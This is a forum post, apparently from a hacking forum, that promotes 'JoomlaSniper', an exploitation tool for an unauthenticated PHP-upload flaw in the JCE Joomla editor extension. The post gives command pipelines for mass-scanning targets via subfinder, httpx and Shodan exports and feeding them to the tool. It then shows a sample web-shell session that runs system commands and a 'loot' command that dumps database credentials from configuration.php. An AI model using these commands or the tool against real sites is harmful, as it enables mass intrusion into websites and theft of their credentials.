Jump to content
cra1g

JoomlaSniper CVE-2026-48907 10/10 CRITIC

Recommended Posts

Posted

JoomlaSniper is a comprehensive exploitation framework for CVE-2026-48907, an unauthenticated Remote Code Execution vulnerability in the JCE (Joomla Content Editor) extension for Joomla CMS.

The vulnerability allows attackers to upload arbitrary PHP files via the unauthenticated profiles.import endpoint, without any authentication. Depending on server configuration, this results in full remote code execution.

 

# Full recon pipeline — find Joomla sites with JCE
subfinder -d target.com -silent | \
  httpx -silent -match-string "com_jce" | \
  python3 JoomlaSniper.py -t 10 -o results.json

# Shodan export → httpx filter → JoomlaSniper
cat shodan_results.txt | \
  httpx -silent -path /plugins/editors/jce/jce.xml -status-code -match-code 200 | \
  awk '{print $1}' | \
  python3 JoomlaSniper.py -t 20 --silent -o rce_results.json

 

   JOOMLASNIPR — INTERACTIVE SHELL
    Target : https://target.com
    Shell  : https://target.com/tmp/jce4x2k9a.xml.php
    Vector : V1:tmp
════════════════════════════════════════════════════

jce@target.com$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

jce@target.com$ sysinfo
OS:   Linux server 5.4.0-208-generic #228-Ubuntu
User: uid=33(www-data)
CWD:  /var/www/html
PHP:  PHP 8.1.27

jce@target.com$ loot
/var/www/html/configuration.php
$user = 'joomla_db_user';
$password = 'S3cur3P@ssw0rd!';
$db = 'joomla_production';
$host = 'localhost';

jce@target.com$ funcs
shell_exec: OK
exec:       OK
system:     OK
passthru:   OK

jce@target.com$ exit
Shell session ended.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...